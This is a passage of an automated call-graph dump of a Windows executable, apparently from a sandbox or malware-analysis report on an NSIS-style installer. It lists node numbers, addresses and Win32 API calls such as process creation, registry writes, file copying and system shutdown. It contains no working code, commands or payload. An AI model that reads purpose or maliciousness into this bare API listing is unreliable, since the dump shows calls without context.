3094 4057bb SetFileAttributesA 3092->3094 3093->3054 3093->3055 3094->3093 3096 40563b 3095->3096 3097 405640 CharPrevA 3096->3097 3098 40564c 3096->3098 3097->3096 3097->3098 3098->3042 3099->3049 3102 404eba 3100->3102 3110 404f5d 3100->3110 3101 404ed7 lstrlenA 3104 404f00 3101->3104 3105 404ee5 lstrlenA 3101->3105 3102->3101 3103 405b16 17 API calls 3102->3103 3103->3101 3107 404f13 3104->3107 3108 404f06 SetWindowTextA 3104->3108 3106 404ef7 lstrcatA 3105->3106 3105->3110 3106->3104 3109 404f19 SendMessageA SendMessageA SendMessageA 3107->3109 3107->3110 3108->3107 3109->3110 3110->3069 3144 405dda GetModuleHandleA 3111->3144 3114 4058aa GetShortPathNameA 3115 40599f 3114->3115 3116 4058bf 3114->3116 3115->3069 3116->3115 3119 4058c7 wsprintfA 3116->3119 3118 40588e CloseHandle GetShortPathNameA 3118->3115 3120 4058a2 3118->3120 3121 405b16 17 API calls 3119->3121 3120->3114 3120->3115 3122 4058ef 3121->3122 3149 4057cb GetFileAttributesA CreateFileA 3122->3149 3124 4058fc 3124->3115 3125 40590b GetFileSize GlobalAlloc 3124->3125 3126 405998 CloseHandle 3125->3126 3127 405929 ReadFile 3125->3127 3126->3115 3127->3126 3128 40593d 3127->3128 3128->3126 3150 405740 lstrlenA 3128->3150 3131 405952 3155 405af4 lstrcpynA 3131->3155 3132 4059ac 3134 405740 4 API calls 3132->3134 3135 405960 3134->3135 3136 405973 SetFilePointer WriteFile GlobalFree 3135->3136 3136->3126 3137->3073 3139 405695 3138->3139 3142 4056a1 3138->3142 3140 40569c CharNextA 3139->3140 3139->3142 3141 4056be 3140->3141 3141->3075 3141->3077 3142->3141 3143 405612 CharNextA 3142->3143 3143->3142 3145 405e01 GetProcAddress 3144->3145 3146 405df6 LoadLibraryA 3144->3146 3147 40584d 3145->3147 3146->3145 3146->3147 3147->3114 3147->3115 3148 4057cb GetFileAttributesA CreateFileA 3147->3148 3148->3118 3149->3124 3151 405776 lstrlenA 3150->3151 3152 405780 3151->3152 3153 405754 lstrcmpiA 3151->3153 3152->3131 3152->3132 3153->3152 3154 40576d CharNextA 3153->3154 3154->3151 3155->3135 3725 402366 3726 40236c 3725->3726 3727 402a85 17 API calls 3726->3727 3728 40237e 3727->3728 3729 402a85 17 API calls 3728->3729 3730 402388 RegCreateKeyExA 3729->3730 3731 4023b2 3730->3731 3732 40291a 3730->3732 3733 4023ca 3731->3733 3734 402a85 17 API calls 3731->3734 3735 4023d6 3733->3735 3737 402a68 17 API calls 3733->3737 3736 4023c3 lstrlenA 3734->3736 3738 4023f1 RegSetValueExA 3735->3738 3740 402f71 21 API calls 3735->3740 3736->3733 3737->3735 3739 402407 RegCloseKey 3738->3739 3739->3732 3740->3738 3749 401d68 GetDC GetDeviceCaps 3750 402a68 17 API calls 3749->3750 3751 401d84 MulDiv 3750->3751 3752 402a68 17 API calls 3751->3752 3753 401d99 3752->3753 3754 405b16 17 API calls 3753->3754 3755 401dd2 CreateFontIndirectA 3754->3755 3756 40251b 3755->3756 3757 402569 3758 402a68 17 API calls 3757->3758 3761 402573 3758->3761 3759 4025e9 3760 4025a7 ReadFile 3760->3759 3760->3761 3761->3759 3761->3760 3762 4025eb 3761->3762 3763 4025fb 3761->3763 3766 405a52 wsprintfA 3762->3766 3763->3759 3765 402611 SetFilePointer 3763->3765 3765->3759 3766->3759 3455 40176c 3456 402a85 17 API calls 3455->3456 3457 401773 3456->3457 3458 4057fa 2 API calls 3457->3458 3459 40177a 3458->3459 3460 4057fa 2 API calls 3459->3460 3460->3459 3767 4042ec 3768 404322 3767->3768 3769 4042fc 3767->3769 3771 403f5c 8 API calls 3768->3771 3770 403ef5 18 API calls 3769->3770 3772 404309 SetDlgItemTextA 3770->3772 3773 40432e 3771->3773 3772->3768 3774 40196d 3775 402a85 17 API calls 3774->3775 3776 401974 lstrlenA 3775->3776 3777 40251b 3776->3777 3778 4047ee GetDlgItem GetDlgItem 3779 404842 7 API calls 3778->3779 3783 404a5f 3778->3783 3780 4048e8 DeleteObject 3779->3780 3781 4048db SendMessageA 3779->3781 3782 4048f3 3780->3782 3781->3780 3784 40492a 3782->3784 3787 405b16 17 API calls 3782->3787 3803 404b49 3783->3803 3810 404ad3 3783->3810 3831 40476e SendMessageA 3783->3831 3785 403ef5 18 API calls 3784->3785 3788 40493e 3785->3788 3786 404bf8 3790 404c01 SendMessageA 3786->3790 3791 404c0d 3786->3791 3792 40490c SendMessageA SendMessageA 3787->3792 3794 403ef5 18 API calls 3788->3794 3789 404a52 3796 403f5c 8 API calls 3789->3796 3790->3791 3798 404c26 3791->3798 3799 404c1f ImageList_Destroy 3791->3799 3807 404c36 3791->3807 3792->3782 3811 40494c 3794->3811 3795 404ba2 SendMessageA 3795->3789 3801 404bb7 SendMessageA 3795->3801 3802 404de8 3796->3802 3797 404b3b SendMessageA 3797->3803 3804 404c2f GlobalFree 3798->3804 3798->3807 3799->3798 3800 404d9c 3800->3789 3808 404dae ShowWindow GetDlgItem ShowWindow 3800->3808 3806 404bca 3801->3806 3803->3786 3803->3789 3803->3795 3804->3807 3805 404a20 GetWindowLongA SetWindowLongA 3809 404a39 3805->3809 3818 404bdb SendMessageA 3806->3818 3807->3800 3817 40140b 2 API calls 3807->3817 3825 404c68 3807->3825 3808->3789 3812 404a57 3809->3812 3813 404a3f ShowWindow 3809->3813 3810->3797 3810->3803 3811->3805 3816 40499b SendMessageA 3811->3816 3819 404a1a 3811->3819 3820 4049d7 SendMessageA 3811->3820 3821 4049e8 SendMessageA 3811->3821 3830 403f2a SendMessageA 3812->3830 3829 403f2a SendMessageA 3813->3829 3816->3811 3817->3825 3818->3786 3819->3805 3819->3809 3820->3811 3821->3811 3822 404d72 InvalidateRect 3822->3800 3823 404d88 3822->3823 3836 40468c 3823->3836 3824 404c96 SendMessageA 3828 404cac 3824->3828 3825->3824 3825->3828 3827 404d20 SendMessageA SendMessageA 3827->3828 3828->3822 3828->3827 3829->3789 3830->3783 3832 404791 GetMessagePos ScreenToClient SendMessageA 3831->3832 3833 4047cd SendMessageA 3831->3833 3834 4047ca 3832->3834 3835 4047c5 3832->3835 3833->3835 3834->3833 3835->3810 3837 4046a6 3836->3837 3838 405b16 17 API calls 3837->3838 3839 4046db 3838->3839 3840 405b16 17 API calls 3839->3840 3841 4046e6 3840->3841 3842 405b16 17 API calls 3841->3842 3843 404717 lstrlenA wsprintfA SetDlgItemTextA 3842->3843 3843->3800 3844 40156f 3845 401586 3844->3845 3846 40157f ShowWindow 3844->3846 3847 401594 ShowWindow 3845->3847 3848 40291a 3845->3848 3846->3845 3847->3848 3849 404def 3850 404e14 3849->3850 3851 404dfd 3849->3851 3852 404e22 IsWindowVisible 3850->3852 3859 404e39 3850->3859 3853 404e03 3851->3853 3867 404e7d 3851->3867 3854 404e2f 3852->3854 3852->3867 3856 403f41 SendMessageA 3853->3856 3858 40476e 5 API calls 3854->3858 3855 404e83 CallWindowProcA 3857 404e0d 3855->3857 3856->3857 3858->3859 3859->3855 3868 405af4 lstrcpynA 3859->3868 3861 404e68 3869 405a52 wsprintfA 3861->3869 3863 404e6f 3864 40140b 2 API calls 3863->3864 3865 404e76 3864->3865 3870 405af4 lstrcpynA 3865->3870 3867->3855 3868->3861 3869->3863 3870->3867 3871 401ef0 3872 402a85 17 API calls 3871->3872 3873 401ef7 3872->3873 3874 405d9c 4 API calls 3873->3874 3875 401efd 3874->3875 3877 401f0f 3875->3877 3878 405a52 wsprintfA 3875->3878 3878->3877 3879 401a71 3880 402a68 17 API calls 3879->3880 3881 401a77 3880->3881 3882 402a68 17 API calls 3881->3882 3883 401a21 3882->3883 3884 401cf2 3885 402a68 17 API calls 3884->3885 3886 401d02 SetWindowLongA 3885->3886 3887 40291a 3886->3887 3888 4028f5 SendMessageA 3889 40291a 3888->3889 3890 40290f InvalidateRect 3888->3890 3890->3889 3156 401e76 3172 402a85 3156->3172 3159 404e9f 24 API calls 3160 401e86 3159->3160 3178 405361 CreateProcessA 3160->3178 3162 401ee2 CloseHandle 3164 4026bf 3162->3164 3163 401eab WaitForSingleObject 3165 401e8c 3163->3165 3166 401eb9 GetExitCodeProcess 3163->3166 3165->3162 3165->3163 3165->3164 3181 405e13 3165->3181 3168 401ed6 3166->3168 3169 401ecb 3166->3169 3168->3162 3171 401ed4 3168->3171 3185 405a52 wsprintfA 3169->3185 3171->3162 3173 402a91 3172->3173 3174 405b16 17 API calls 3173->3174 3175 402ab2 3174->3175 3176 401e7c 3175->3176 3177 405d03 5 API calls 3175->3177 3176->3159 3177->3176 3179 405390 CloseHandle 3178->3179 3180 40539c 3178->3180 3179->3180 3180->3165 3182 405e30 PeekMessageA 3181->3182 3183 405e40 3182->3183 3184 405e26 DispatchMessageA 3182->3184 3183->3163 3184->3182 3185->3171 3898 402078 3899 402a85 17 API calls 3898->3899 3900 40207f 3899->3900 3901 402a85 17 API calls 3900->3901 3902 402089 3901->3902 3903 402a85 17 API calls 3902->3903 3904 402092 3903->3904 3905 402a85 17 API calls 3904->3905 3906 40209c 3905->3906 3907 402a85 17 API calls 3906->3907 3908 4020a6 3907->3908 3909 4020ba CoCreateInstance 3908->3909 3910 402a85 17 API calls 3908->3910 3913 4020d9 3909->3913 3914 402199 3909->3914 3910->3909 3911 401423 24 API calls 3912 4021bf 3911->3912 3913->3914 3915 40216e MultiByteToWideChar 3913->3915 3914->3911 3914->3912 3915->3914 3916 402678 3917 40267b 3916->3917 3918 402693 3916->3918 3919 402688 FindNextFileA 3917->3919 3919->3918 3920 4026d2 3919->3920 3922 405af4 lstrcpynA 3920->3922 3922->3918 3923 401bf8 3924 402a85 17 API calls 3923->3924 3925 401bff 3924->3925 3926 402a85 17 API calls 3925->3926 3927 401c09 3926->3927 3928 401c36 3927->3928 3929 401c7a 3927->3929 3931 402a68 17 API calls 3928->3931 3930 402a85 17 API calls 3929->3930 3932 401c7f 3930->3932 3933 401c3b 3931->3933 3934 402a85 17 API calls 3932->3934 3935 402a68 17 API calls 3933->3935 3936 401c88 FindWindowExA 3934->3936 3937 401c44 3935->3937 3940 401ca6 3936->3940 3938 401c6a SendMessageA 3937->3938 3939 401c4c SendMessageTimeoutA 3937->3939 3938->3940 3939->3940 3192 4032fa #17 OleInitialize SHGetFileInfoA 3260 405af4 lstrcpynA 3192->3260 3194 403351 GetCommandLineA 3261 405af4 lstrcpynA 3194->3261 3196 403363 GetModuleHandleA 3197 40337a 3196->3197 3198 405612 CharNextA 3197->3198 3199 40338e CharNextA 3198->3199 3210 40339b 3199->3210 3200 403404 3201 403417 GetTempPathA 3200->3201 3262 4032c6 3201->3262 3203 40342d 3205 403451 DeleteFileA 3203->3205 3206 403431 GetWindowsDirectoryA lstrcatA 3203->3206 3204 405612 CharNextA 3204->3210 3270 402c7d GetTickCount GetModuleFileNameA 3205->3270 3207 4032c6 11 API calls 3206->3207 3209 40344d 3207->3209 3209->3205 3213 4034cf ExitProcess OleUninitialize 3209->3213 3210->3200 3210->3204 3211 403406 3210->3211 3356 405af4 lstrcpynA 3211->3356 3212 403462 3212->3213 3217 405612 CharNextA 3212->3217 3250 4034bb 3212->3250 3215 4034e4 3213->3215 3219 4035c9 3213->3219 3359 4053c2 3215->3359 3223 403479 3217->3223 3220 40364c ExitProcess 3219->3220 3221 405dda 3 API calls 3219->3221 3226 4035d8 3221->3226 3229 403496 3223->3229 3230 4034fa lstrcatA lstrcmpiA 3223->3230 3227 405dda 3 API calls 3226->3227 3228 4035e1 3227->3228 3231 405dda 3 API calls 3228->3231 3233 4056c8 20 API calls 3229->3233 3230->3213 3232 403516 CreateDirectoryA SetCurrentDirectoryA 3230->3232 3234 4035ea 3231->3234 3235 403538 3232->3235 3236 40352d 3232->3236 3237 4034a1 3233->3237 3238 403638 ExitWindowsEx 3234->3238 3244 4035f8 GetCurrentProcess 3234->3244 3364 405af4 lstrcpynA 3235->3364 3363 405af4 lstrcpynA 3236->3363 3237->3213 3357 405af4 lstrcpynA 3237->3357 3238->3220 3241 403645 3238->3241 3243 40140b 2 API calls 3241->3243 3243->3220 3249 403608 3244->3249 3245 4034b0 3358 405af4 lstrcpynA 3245->3358 3247 405b16 17 API calls 3248 403568 DeleteFileA 3247->3248 3251 403575 CopyFileA 3248->3251 3257 403546 3248->3257 3249->3238 3302 4036a1 3250->3302 3251->3257 3252 4035bd 3254 405842 37 API calls 3252->3254 3253 405842 37 API calls 3253->3257 3255 4035c4 3254->3255 3255->3213 3256 405b16 17 API calls 3256->3257 3257->3247 3257->3252 3257->3253 3257->3256 3258 405361 2 API calls 3257->3258 3259 4035a9 CloseHandle 3257->3259 3258->3257 3259->3257 3260->3194 3261->3196 3263 405d03 5 API calls 3262->3263 3265 4032d2 3263->3265 3264 4032dc 3264->3203 3265->3264 3266 4055e7 3 API calls 3265->3266 3267 4032e4 CreateDirectoryA 3266->3267 3365 4057fa 3267->3365 3369 4057cb GetFileAttributesA CreateFileA 3270->3369 3272 402cc1 3300 402cce 3272->3300 3370 405af4 lstrcpynA 3272->3370 3274 402ce4 3275 40562e 2 API calls 3274->3275 3276 402cea 3275->3276 3371 405af4 lstrcpynA 3276->3371 3278 402cf5 GetFileSize 3279 402e45 3278->3279 3301 402d0c 3278->3301 3280 402e80 GlobalAlloc 3279->3280 3279->3300 3390 4032af SetFilePointer 3279->3390 3283 402e97 3280->3283 3287 4057fa 2 API calls 3283->3287 3284 402e61 3286 40327d ReadFile 3284->3286 3285 402ed8 3288 402edd DestroyWindow 3285->3288 3285->3300 3289 402e6c 3286->3289 3290 402ea8 CreateFileA 3287->3290 3288->3300 3289->3280 3289->3300 3292 402ee8 3290->3292 3290->3300 3291 402de7 GetTickCount 3295 402df2 CreateDialogParamA 3291->3295 3291->3301 3374 4032af SetFilePointer 3292->3374 3294 405e13 2 API calls 3294->3301 3295->3301 3296 402e37 3296->3279 3298 402e3c DestroyWindow 3296->3298 3297 402ef6 3375 402f71 3297->3375 3298->3279 3300->3212 3301->3285 3301->3291 3301->3294 3301->3296 3301->3300 3372 40327d ReadFile 3301->3372 3303 405dda 3 API calls 3302->3303 3304 4036b5 3303->3304 3305 4036bb 3304->3305 3306 4036cd 3304->3306 3423 405a52 wsprintfA 3305->3423 3307 4059db 3 API calls 3306->3307 3308 4036ee 3307->3308 3309 40370c lstrcatA 3308->3309 3311 4059db 3 API calls 3308->3311 3312 4036cb 3309->3312 3311->3309 3414 403955 3312->3414 3315 4056c8 20 API calls 3316 403734 3315->3316 3317 4037bd 3316->3317 3319 4059db 3 API calls 3316->3319 3318 4056c8 20 API calls 3317->3318 3320 4037c3 3318->3320 3321 403760 3319->3321 3322 4037d3 LoadImageA 3320->3322 3325 405b16 17 API calls 3320->3325 3321->3317 3328 40377c lstrlenA 3321->3328 3332 405612 CharNextA 3321->3332 3323 403887 3322->3323 3324 4037fe RegisterClassA 3322->3324 3327 40140b 2 API calls 3323->3327 3326 40383a SystemParametersInfoA CreateWindowExA 3324->3326 3355 4034cb 3324->3355 3325->3322 3326->3323 3331 40388d 3327->3331 3329 4037b0 3328->3329 3330 40378a lstrcmpiA 3328->3330 3334 4055e7 3 API calls 3329->3334 3330->3329 3333 40379a GetFileAttributesA 3330->3333 3337 403955 18 API calls 3331->3337 3331->3355 3335 40377a 3332->3335 3336 4037a6 3333->3336 3338 4037b6 3334->3338 3335->3328 3336->3329 3339 40562e 2 API calls 3336->3339 3340 40389e 3337->3340 3424 405af4 lstrcpynA 3338->3424 3339->3329 3342 403922 3340->3342 3343 4038a6 ShowWindow LoadLibraryA 3340->3343 3425 404f71 OleInitialize 3342->3425 3345 4038c5 LoadLibraryA 3343->3345 3346 4038cc GetClassInfoA 3343->3346 3345->3346 3348 4038e0 GetClassInfoA RegisterClassA 3346->3348 3349 4038f6 DialogBoxParamA 3346->3349 3347 403928 3350 403944 3347->3350 3351 40392c 3347->3351 3348->3349 3352 40140b 2 API calls 3349->3352 3353 40140b 2 API calls 3350->3353 3354 40140b 2 API calls 3351->3354 3351->3355 3352->3355 3353->3355 3354->3355 3355->3213 3356->3201 3357->3245 3358->3250 3360 4053d7 3359->3360 3361 4034f2 ExitProcess 3360->3361 3362 4053eb MessageBoxIndirectA 3360->3362 3362->3361 3363->3235 3364->3257 3366 405805 GetTickCount GetTempFileNameA 3365->3366 3367 405831 3366->3367 3368 4032f8 3366->3368 3367->3366 3367->3368 3368->3203 3369->3272 3370->3274 3371->3278 3373 40329e 3372->3373 3373->3301 3374->3297 3376 402f82 SetFilePointer 3375->3376 3377 402f9e 3375->3377 3376->3377 3391 40309c GetTickCount 3377->3391 3380 402faf ReadFile 3381 402fcf 3380->3381 3386 40305b 3380->3386 3382 40309c 16 API calls 3381->3382 3381->3386 3383 402fe6 3382->3383 3384 403061 ReadFile 3383->3384 3383->3386 3389 402ff6 3383->3389 3384->3386 3386->3300 3387 403011 ReadFile 3387->3386 3387->3389 3388 40302a WriteFile 3388->3386 3388->3389 3389->3386 3389->3387 3389->3388 3390->3284 3392 4030ce 3391->3392 3399 402fa7 3391->3399 3406 4032af SetFilePointer 3392->3406 3394 4030d9 SetFilePointer 3397 4030f9 3394->3397 3395 40327d ReadFile 3395->3397 3397->3395 3398 40316d GetTickCount 3397->3398 3397->3399 3400 405e13 2 API calls 3397->3400 3402 4031d5 WriteFile 3397->3402 3403 40322c SetFilePointer 3397->3403 3407 405ed4 3397->3407 3398->3397 3401 403177 CreateDialogParamA 3398->3401 3399->3380 3399->3386 3400->3397 3401->3397 3402->3397 3402->3399 3404 40324b 3403->3404 3404->3399 3405 403253 SendMessageA DestroyWindow 3404->3405 3405->3399 3406->3394 3408 405ef9 3407->3408 3409 405f01 3407->3409 3408->3397 3409->3408 3410 405f91 GlobalAlloc 3409->3410 3411 405f88 GlobalFree 3409->3411 3412 406008 GlobalAlloc 3409->3412 3413 405fff GlobalFree 3409->3413 3410->3408 3410->3409 3411->3410 3412->3408 3412->3409 3413->3412 3415 403969 3414->3415 3432 405a52 wsprintfA 3415->3432 3417 4039da 3418 405b16 17 API calls 3417->3418 3419 4039e6 SetWindowTextA 3418->3419 3420 403a02 3419->3420 3421 40371c 3419->3421 3420->3421 3422 405b16 17 API calls 3420->3422 3421->3315 3422->3420 3423->3312 3424->3317 3426 403f41 SendMessageA 3425->3426 3427 404f94 3426->3427 3430 401389 2 API calls 3427->3430 3431 404fbb 3427->3431 3428 403f41 SendMessageA 3429 404fcd OleUninitialize 3428->3429 3429->3347 3430->3427 3431->3428 3432->3417 3461 40177f 3462 402a85 17 API calls 3461->3462 3463 401786 3462->3463 3464 4017a4 3463->3464 3465 4017ac 3463->3465 3500 405af4 lstrcpynA 3464->3500 3501 405af4 lstrcpynA 3465->3501 3468 4017aa 3472 405d03 5 API calls 3468->3472 3469 4017b7 3470 4055e7 3 API calls 3469->3470 3471 4017bd lstrcatA 3470->3471 3471->3468 3478 4017c9 3472->3478 3473 405d9c 4 API calls 3473->3478 3474 4057ac 2 API calls 3474->3478 3476 4017e0 CompareFileTime 3476->3478 3477 4018a4 3479 404e9f 24 API calls 3477->3479 3478->3473 3478->3474 3478->3476 3478->3477 3481 405af4 lstrcpynA 3478->3481 3488 405b16 17 API calls 3478->3488 3494 4053c2 MessageBoxIndirectA 3478->3494 3497 40187b 3478->3497 3499 4057cb GetFileAttributesA CreateFileA 3478->3499 3482 4018ae 3479->3482 3480 404e9f 24 API calls 3483 401890 3480->3483 3481->3478 3484 402f71 21 API calls 3482->3484 3485 4018c1 3484->3485 3486 4018d5 SetFileTime 3485->3486 3487 4018e7 CloseHandle 3485->3487 3486->3487 3487->3483 3489 4018f8 3487->3489 3488->3478 3490 401910 3489->3490 3491 4018fd 3489->3491 3493 405b16 17 API calls 3490->3493 3492 405b16 17 API calls 3491->3492 3495 401905 lstrcatA 3492->3495 3496 401918 3493->3496 3494->3478 3495->3496 3498 4053c2 MessageBoxIndirectA 3496->3498 3497->3480 3497->3483 3498->3483 3499->3478 3500->3468 3501->3469 3941 40197f 3942 402a68 17 API calls 3941->3942 3943 401986 3942->3943 3944 402a68 17 API calls 3943->3944 3945 401990 3944->3945 3946 402a85 17 API calls 3945->3946 3947 401999 3946->3947 3948 4019ac lstrlenA 3947->3948 3953 4019e7 3947->3953 3949 4019b6 3948->3949 3949->3953 3954 405af4 lstrcpynA 3949->3954 3951 4019d0 3952 4019dd lstrlenA 3951->3952 3951->3953 3952->3953 3954->3951 3955 4024ff 3956 402a85 17 API calls 3955->3956 3957 402506 3956->3957 3960 4057cb GetFileAttributesA CreateFileA 3957->3960 3959 402512 3960->3959 3961 401000 3962 401037 BeginPaint GetClientRect 3961->3962 3965 40100c DefWindowProcA 3961->3965 3963 4010f3 3962->3963 3967 401073 CreateBrushIndirect FillRect DeleteObject 3963->3967 3968 4010fc 3963->3968 3966 401179 3965->3966 3967->3963 3969 401102 CreateFontIndirectA 3968->3969 3970 401167 EndPaint 3968->3970 3969->3970 3971 401112 6 API calls 3969->3971 3970->3966 3971->3970 3972 401a00 3973 402a85 17 API calls 3972->3973 3974 401a07 3973->3974 3975 402a85 17 API calls 3974->3975 3976 401a10 3975->3976 3977 401a17 lstrcmpiA 3976->3977 3978 401a29 lstrcmpA 3976->3978 3979 401a1d 3977->3979 3978->3979 3980 401503 3981 402a68 17 API calls 3980->3981 3983 401509 Sleep 3981->3983 3984 40291a 3983->3984 3985 406083 3986 405f07 3985->3986 3987 406872 3986->3987 3988 405f91 GlobalAlloc 3986->3988 3989 405f88 GlobalFree 3986->3989 3990 406008 GlobalAlloc 3986->3990 3991 405fff GlobalFree 3986->3991 3988->3986 3988->3987 3989->3988 3990->3986 3990->3987 3991->3990 3992 402286 3993 402294 3992->3993 3994 40228e 3992->3994 3996 402a85 17 API calls 3993->3996 3998 4022a4 3993->3998 3995 402a85 17 API calls 3994->3995 3995->3993 3996->3998 3997 4022b2 4000 402a85 17 API calls 3997->4000 3998->3997 3999 402a85 17 API calls 3998->3999 3999->3997 4001 4022bb WritePrivateProfileStringA 4000->4001 4002 404009 lstrcpynA lstrlenA 4003 40230a 4004 40233a 4003->4004 4005 40230f 4003->4005 4007 402a85 17 API calls 4004->4007 4014 402b8f 4005->4014 4009 402341 4007->4009 4008 402316 4010 402a85 17 API calls 4008->4010 4013 402357 4008->4013 4018 402ac5 RegOpenKeyExA 4009->4018 4011 402327 RegDeleteValueA RegCloseKey 4010->4011 4011->4013 4015 402a85 17 API calls 4014->4015 4016 402ba8 4015->4016 4017 402bb6 RegOpenKeyExA 4016->4017 4017->4008 4019 402b3c 4018->4019 4022 402af0 4018->4022 4019->4013 4020 402b16 RegEnumKeyA 4021 402b28 RegCloseKey 4020->4021 4020->4022 4024 405dda 3 API calls 4021->4024 4022->4020 4022->4021 4023 402b4d RegCloseKey 4022->4023 4025 402ac5 3 API calls 4022->4025 4023->4019 4026 402b38 4024->4026 4025->4022 4026->4019 4027 402b68 RegDeleteKeyA 4026->4027 4027->4019 4028 40248a 4029 402b8f 18 API calls 4028->4029 4030 402494 4029->4030 4031 402a68 17 API calls 4030->4031 4032 40249d 4031->4032 4033 4024c0 RegEnumValueA 4032->4033 4034 4024b4 RegEnumKeyA 4032->4034 4035 4026bf 4032->4035 4033->4035 4036 4024d9 RegCloseKey 4033->4036 4034->4036 4036->4035 4038 40280c 4039 402a68 17 API calls 4038->4039 4040 402812 4039->4040 4041 402836 4040->4041 4042 40284d 4040->4042 4048 4026bf 4040->4048 4043 40284a 4041->4043 4044 40283b 4041->4044 4045 402863 4042->4045 4046 402857 4042->4046 4053 405a52 wsprintfA 4043->4053 4052 405af4 lstrcpynA 4044->4052 4047 405b16 17 API calls 4045->4047 4049 402a68 17 API calls 4046->4049 4047->4048 4049->4048 4052->4048 4053->4048 4061 401d0e GetDlgItem GetClientRect 4062 402a85 17 API calls 4061->4062 4063 401d3e LoadImageA SendMessageA 4062->4063 4064 40291a 4063->4064 4065 401d5c DeleteObject 4063->4065 4065->4064 4066 401e0e 4067 402a85 17 API calls 4066->4067 4068 401e14 4067->4068 4069 402a85 17 API calls 4068->4069 4070 401e1d 4069->4070 4071 402a85 17 API calls 4070->4071 4072 401e26 wsprintfA 4071->4072 4073 401423 24 API calls 4072->4073 4074 401e44 ShellExecuteA 4073->4074 4075 401e71 4074->4075 4076 401490 4077 404e9f 24 API calls 4076->4077 4078 401497 4077->4078 4079 402412 4080 402b8f 18 API calls 4079->4080 4081 40241c 4080->4081 4082 402a85 17 API calls 4081->4082 4083 402425 4082->4083 4084 4026bf 4083->4084 4085 40242f RegQueryValueExA 4083->4085 4086 40244f 4085->4086 4087 402455 RegCloseKey 4085->4087 4086->4087 4090 405a52 wsprintfA 4086->4090 4087->4084 4090->4087 4091 402892 4092 402a68 17 API calls 4091->4092 4093 402898 4092->4093 4094 4028c9 4093->4094 4095 4026bf 4093->4095 4097 4028a6 4093->4097 4094->4095 4096 405b16 17 API calls 4094->4096 4096->4095 4097->4095 4099 405a52 wsprintfA 4097->4099 4099->4095 4100 40151d SetForegroundWindow 4101 40291a 4100->4101 4102 40149d 4103 4014ab PostQuitMessage 4102->4103 4104 402271 4102->4104 4103->4104 4105 40159d 4106 402a85 17 API calls 4105->4106 4107 4015a4 SetFileAttributesA 4106->4107 4108 4015b6 4107->4108 4109 401f20 4110 402a85 17 API calls 4109->4110 4111 401f27 GetFileVersionInfoSizeA 4110->4111 4112 401f4a GlobalAlloc 4111->4112 4113 401fa0 4111->4113 4112->4113 4114 401f5e GetFileVersionInfoA 4112->4114 4114->4113 4115 401f6f VerQueryValueA 4114->4115 4115->4113 4116 401f88 4115->4116 4120 405a52 wsprintfA 4116->4120 4118 401f94 4121 405a52 wsprintfA 4118->4121 4120->4118 4121->4113 4122 402521 4123 402526 4122->4123 4124 402537 4122->4124 4125 402a68 17 API calls 4123->4125 4126 402a85 17 API calls 4124->4126 4129 40252d 4125->4129 4127 40253e lstrlenA 4126->4127 4127->4129 4128 4026bf 4129->4128 4130 40255d WriteFile 4129->4130 4130->4128 4131 4026a1 4132 402a85 17 API calls 4131->4132 4133 4026a8 FindFirstFileA 4132->4133 4134 4026cb 4133->4134 4138 4026bb 4133->4138 4135 4026d2 4134->4135 4139 405a52 wsprintfA 4134->4139 4140 405af4 lstrcpynA 4135->4140 4139->4135 4140->4138 2880 403a22 2881 403b75 2880->2881 2882 403a3a 2880->2882 2884 403bc6 2881->2884 2885 403b86 GetDlgItem GetDlgItem 2881->2885 2882->2881 2883 403a46 2882->2883 2886 403a51 SetWindowPos 2883->2886 2887 403a64 2883->2887 2889 403c20 2884->2889 2979 401389 2884->2979 2976 403ef5 2885->2976 2886->2887 2890 403a81 2887->2890 2891 403a69 ShowWindow 2887->2891 2898 403b70 2889->2898 2953 403f41 2889->2953 2894 403aa3 2890->2894 2895 403a89 DestroyWindow 2890->2895 2891->2890 2892 403bb0 SetClassLongA 2896 40140b 2 API calls 2892->2896 2900 403aa8 SetWindowLongA 2894->2900 2901 403ab9 2894->2901 2899 403e9f 2895->2899 2896->2884 2899->2898 2908 403eaf ShowWindow 2899->2908 2900->2898 2905 403b62 2901->2905 2906 403ac5 GetDlgItem 2901->2906 2903 40140b 2 API calls 2921 403c32 2903->2921 2904 403e80 DestroyWindow EndDialog 2904->2899 2962 403f5c 2905->2962 2909 403af5 2906->2909 2910 403ad8 SendMessageA IsWindowEnabled 2906->2910 2907 403bfc SendMessageA 2907->2898 2908->2898 2913 403b02 2909->2913 2914 403b15 2909->2914 2915 403b49 SendMessageA 2909->2915 2924 403afa 2909->2924 2910->2898 2910->2909 2913->2915 2913->2924 2918 403b32 2914->2918 2919 403b1d 2914->2919 2915->2905 2917 403ef5 18 API calls 2917->2921 2923 40140b 2 API calls 2918->2923 2956 40140b 2919->2956 2920 403b30 2920->2905 2921->2903 2921->2904 2921->2917 2926 403ef5 18 API calls 2921->2926 2983 405b16 2921->2983 2925 403b39 2923->2925 2959 403ece 2924->2959 2925->2905 2925->2924 2927 403cad GetDlgItem 2926->2927 2928 403cc2 2927->2928 2929 403cca ShowWindow EnableWindow 2927->2929 2928->2929 3000 403f17 EnableWindow 2929->3000 2931 403cf4 EnableWindow 2934 403d08 2931->2934 2932 403d0d GetSystemMenu EnableMenuItem SendMessageA 2933 403d3d SendMessageA 2932->2933 2932->2934 2933->2934 2934->2932 3001 403f2a SendMessageA 2934->3001 3002 405af4 lstrcpynA 2934->3002 2937 403d6b lstrlenA 2938 405b16 17 API calls 2937->2938 2939 403d7c SetWindowTextA 2938->2939 2940 401389 2 API calls 2939->2940 2942 403d8d 2940->2942 2941 403dc0 DestroyWindow 2941->2899 2943 403dda CreateDialogParamA 2941->2943 2942->2898 2942->2921 2942->2941 2944 403dbb 2942->2944 2943->2899 2945 403e0d 2943->2945 2944->2898 2946 403ef5 18 API calls 2945->2946 2947 403e18 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2946->2947 2948 401389 2 API calls 2947->2948 2949 403e5e 2948->2949 2949->2898 2950 403e66 ShowWindow 2949->2950 2951 403f41 SendMessageA 2950->2951 2952 403e7e 2951->2952 2952->2899 2954 403f59 2953->2954 2955 403f4a SendMessageA 2953->2955 2954->2921 2955->2954 2957 401389 2 API calls 2956->2957 2958 401420 2957->2958 2958->2924 2960 403ed5 2959->2960 2961 403edb SendMessageA 2959->2961 2960->2961 2961->2920 2963 403ffd 2962->2963 2964 403f74 GetWindowLongA 2962->2964 2963->2898 2964->2963 2965 403f85 2964->2965 2966 403f94 GetSysColor 2965->2966 2967 403f97 2965->2967 2966->2967 2968 403fa7 SetBkMode 2967->2968 2969 403f9d SetTextColor 2967->2969 2970 403fc5 2968->2970 2971 403fbf GetSysColor 2968->2971 2969->2968 2972 